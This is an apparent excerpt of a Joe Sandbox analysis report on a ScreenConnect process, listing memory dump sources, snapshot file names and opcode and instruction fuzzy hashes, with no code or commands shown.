                                                                                                                                                                                                                                                        • Opcode ID: 88e4dde596db4c48ac60f2dde0daecb850a9d505a08cc846b5c50487d1099b07
                                                                                                                                                                                                                                                        • Instruction ID: 7472ac98231162058a04ea0cade30ba6a305543aa3aa52032bd6105da79550c2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88e4dde596db4c48ac60f2dde0daecb850a9d505a08cc846b5c50487d1099b07
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6218B31D1070A9EDB02EFB9C8505EAFBB4EF9A310F10CA2AD559A7111FB70A2D5C791
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8abeef9aaf732bfe515ce6f818f4fd2a96e339313cb4317a62d140753358a45c
                                                                                                                                                                                                                                                        • Instruction ID: dd102baeb23fd1611178e58e95b10f32f00aa4e43e3f3a31c01e11794c4bad14
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8abeef9aaf732bfe515ce6f818f4fd2a96e339313cb4317a62d140753358a45c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 432102B1A00215CFCB149F68DA484AEBBBAFF883317008569D91AE7348DB309E42CF51
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0476ed006fa374ce1f79e259a3621da4f103175ebb35c8205ac865f6794955bf
                                                                                                                                                                                                                                                        • Instruction ID: 0d878952a434f83ffc84e39e95a194a29f24ebe38f01dc017df774326463388f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0476ed006fa374ce1f79e259a3621da4f103175ebb35c8205ac865f6794955bf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5221C334F413098FDB19DF60D4547ED7BF2AB88319F144038D40ABB294DA716946CFA0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3e2a79dd873220eefcb2ccefd5a084de98ab6ca6c2b273659f218c381aa41898
                                                                                                                                                                                                                                                        • Instruction ID: be73634ca2d75ae1ffea26498bcee6e50540b1a2d73b658430f07dc5a6f12437
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e2a79dd873220eefcb2ccefd5a084de98ab6ca6c2b273659f218c381aa41898
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4215E30200B059FD734CF26D844A9ABBF5EF84321F148A2CD497976A5DB31E99ACF90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1810085782.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_18bd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 647339a90d4c8e61c2920eb7e6a591457f860e278eb98c942e203b03b78afba8
                                                                                                                                                                                                                                                        • Instruction ID: ec970d1cbdf323430ca2caa17c0bf5aa86d877306e5ac7b3ec8ed9d138567541
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 647339a90d4c8e61c2920eb7e6a591457f860e278eb98c942e203b03b78afba8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68211F74F1020ADFDB00DBA8E8545AEBBB6FF98300B108958D505B7360DF34AD158FA1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3d4e225acf626ca1750d88b88638a8bdc48f838ae7bff447a39afbfcc3d86e6c
                                                                                                                                                                                                                                                        • Instruction ID: d2f366953cf81db82e5f93400f338a13ab5bdcb36687d2b91bd6b4d78fd28f92
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d4e225acf626ca1750d88b88638a8bdc48f838ae7bff447a39afbfcc3d86e6c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB114276A0020A9FCB01DF64D9809DDBBF1FF49314B10816AD904BB261D775AA1ACB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7a937524d3c6df334f6ba1445d52d2cf9c3fc6a2f5a9649183a0594afdeb01b1
                                                                                                                                                                                                                                                        • Instruction ID: 0778e83751b06a4c8eb648c00e5454b7314a4dba28cb907f042221dd6e1c8718
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a937524d3c6df334f6ba1445d52d2cf9c3fc6a2f5a9649183a0594afdeb01b1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B014C363847805FDB16EB78A8524ED3FF1EF4732134241EAD489CB193E6289A17C341
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ceeae97a187a1c7675edb1ce5357f00ec443fd6838e49b86f3cabedf87a7e121
                                                                                                                                                                                                                                                        • Instruction ID: f70e3bac1ad9a8a661ad1f2602c75d5069e2a150d586924a23b0593863c9ad6c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ceeae97a187a1c7675edb1ce5357f00ec443fd6838e49b86f3cabedf87a7e121
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E421F2B6C003498FDB14CF9AD4447EEFBF5EB88224F15842AD959A7240C378A646CFA5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0d500a8f08b841171193170b4a9d01dfa45d5aaf08878171aaa934caed115f0e
                                                                                                                                                                                                                                                        • Instruction ID: 055a60daa0e64e499506c01873fbc20f05b231bc59a93c1e119277315a2766ff
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d500a8f08b841171193170b4a9d01dfa45d5aaf08878171aaa934caed115f0e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8701D230B043009FEB14AA79E84066EB7EAAF89254B40C56DD449E7755EBB0EC598391
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b89d6cecae882248eb0e7f3b825d41caa6e868365f05327f934a6f9d0e1c3156
                                                                                                                                                                                                                                                        • Instruction ID: eb771e0e46286c99923126618d72914a49b7b4758a3663f703ddf019a8c2549f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b89d6cecae882248eb0e7f3b825d41caa6e868365f05327f934a6f9d0e1c3156
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5014C35700712DF9725DF69D884A1AB7EAAFCC6293244068E94EAB754DB60FC46CBC0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 80a490976eef8a9d737709f050d0d7e6cf2670d309737fd1af915b2a7d62d1fa
                                                                                                                                                                                                                                                        • Instruction ID: 32f85e6ba2508cfc4b42a6a5d6bef969360b53279acf24447001716e6837528e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80a490976eef8a9d737709f050d0d7e6cf2670d309737fd1af915b2a7d62d1fa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6116A3190010DAFDF04DFA8D880AECBBB2FF85305B59C954E009AB119C771AD86DFA1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 92eea7ced198bdb43b8fd434a20828aa67db16635d7ee7e618835e49884e1ce6
                                                                                                                                                                                                                                                        • Instruction ID: 0ae5cf2ecb947702314746cb1d4cbc0c2bba40bb10221c90dc3bf6b092649b4a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92eea7ced198bdb43b8fd434a20828aa67db16635d7ee7e618835e49884e1ce6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1811DA71E1021DDBEF14EBA8D8557EDBBB1AF89311F00446AD006BB2A0DAB41D84CBA5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7f8d5fa3600002f5262060ae3d11a6c4d011918055f015fd5f0adcf4cf692cc3
                                                                                                                                                                                                                                                        • Instruction ID: f05688dbf30327753ac055092e8b895dbc1e559789dbfded3e5358dde8bc8fe3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f8d5fa3600002f5262060ae3d11a6c4d011918055f015fd5f0adcf4cf692cc3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9001D232D0015D9BEF04DFA9E8408DDBBB2FF89310F058526E409B7214DB306A47CB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 88861e1e2c7ac366d516e0d7b476399f55522faab34fb8dd1a32a70983a2d987
                                                                                                                                                                                                                                                        • Instruction ID: f34325249bbc8081172f5ccf2cd95acaa7855cce181b204e07e6b9475de28fba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88861e1e2c7ac366d516e0d7b476399f55522faab34fb8dd1a32a70983a2d987
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD117071E0031C9BEF14DBA4D8617DD7BB1AF49310F000869D002B73A4DBB42D80CBA5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: afdd3ddd14e3f664bce6398a5130ba6cff4239c4f715d9ddbe37027e673572d7
                                                                                                                                                                                                                                                        • Instruction ID: 84ca7d71d2566e9c414ffb3bc12b7ae0362a350caf776f96f7b61b28ac8658a0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afdd3ddd14e3f664bce6398a5130ba6cff4239c4f715d9ddbe37027e673572d7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF110035A0020A9FCF00DFA8D9409DEBBF5FF49314B108569D905BB250D771AA0ACB91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3a24c1cf145b3cf30b240fbc74c6c7a5d17061ca07631c6e7b674eebe35759dd
                                                                                                                                                                                                                                                        • Instruction ID: 192cd65905bf91eda9beeb72af507d7f1586d534b1d546b215ce79f63d55b2d8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a24c1cf145b3cf30b240fbc74c6c7a5d17061ca07631c6e7b674eebe35759dd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A01DF363002052BE705B66A94D066FB2D3EFD56643908929D54E9B354DE70FC0A8BA2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810085782.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_18bd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6efc599e1d9227125ba80a09dff7e95d21964fa684af0ec458081feca20834eb
                                                                                                                                                                                                                                                        • Instruction ID: 97c0189d27f875709eaddc806d61e4850f3aca4dc2f4cf973a959374deca2d74
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6efc599e1d9227125ba80a09dff7e95d21964fa684af0ec458081feca20834eb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF01807140D3C0AFD7128B258C84792BFA4EF43264F1985DBE988CF2A3C2695C45CB72
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e157036864a1d927b6505ad5f8675fc651d91f324766c470852d49dec9994300
                                                                                                                                                                                                                                                        • Instruction ID: c332103cad5d4d7f98fb72fbb40a41e9ddb7819a3b5bf8793f84e9b9e34107a8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e157036864a1d927b6505ad5f8675fc651d91f324766c470852d49dec9994300
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79012B71B013199B9B058A6DA8444ABB7D9FFC4610314896ED409EB300DFB1DC0287D4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fb20489b84f08219ffaba66edb56505344c95ea6d0b7dbf66e0f32e0d1d7f290
                                                                                                                                                                                                                                                        • Instruction ID: bed54825f4ce81ec2908fd8ef736e166118a158d7f92a002aac8ea0def84b2ee
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb20489b84f08219ffaba66edb56505344c95ea6d0b7dbf66e0f32e0d1d7f290
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF014E7190D3442FDB15677994651AD7FA4DE47210B4544DBD08ADB343DE34D4478392
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810085782.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_18bd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: cd51f2f2e2f55ae762e92a656aab6427fcaacb686af73594d01f925001c00864
                                                                                                                                                                                                                                                        • Instruction ID: 188f5936ba95877b1c04b2119c262a948ffb720c5baf526dc8fc411fc53518f1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd51f2f2e2f55ae762e92a656aab6427fcaacb686af73594d01f925001c00864
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A01FC71405344ABE7108E55C8C07A6BF98DF413A8F18C516ED498F343C2759642CAB1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c3faef87ff6418de13050160eb9119677251840e09d47896c38664946466ed2f
                                                                                                                                                                                                                                                        • Instruction ID: db9c7a2a8e28631f9d4b9a0e4b893b89efd7f05a3d097c2e589998b08f54c8b4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3faef87ff6418de13050160eb9119677251840e09d47896c38664946466ed2f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B401D6B280D394CFD7069B78A8841C8BFF0EF57224F0945ABC889CB156E2345A57CB52
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a09dab3f82fe2c56d12cecba25c67b99b876f440d9f6c4b4d0e299ea538426f1
                                                                                                                                                                                                                                                        • Instruction ID: 0d753cb42f05c12f594debf7370c88c4683e6ec3d42d7439b7be3b8d9893674b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a09dab3f82fe2c56d12cecba25c67b99b876f440d9f6c4b4d0e299ea538426f1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C01DCB2959387CFEF12DF24E8417A97FB0EF06310F000EAEC0829A182CB78504A8B41
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 30930a9b74858d7c62a72da48743fdc20d3084c6bac5e410ea29edacd626d30b
                                                                                                                                                                                                                                                        • Instruction ID: b2ad19a7904a314f5e9f270240f9a02663f28f6f0bb72d2ed489a1ce49ca9a13
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30930a9b74858d7c62a72da48743fdc20d3084c6bac5e410ea29edacd626d30b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88F05E327043006BA7149B6AE44099FB7EAEFC5654344C56DE50ADB310EE72F90A8B91
                                                                                                                                                                                                                                                        Memory Dump Source
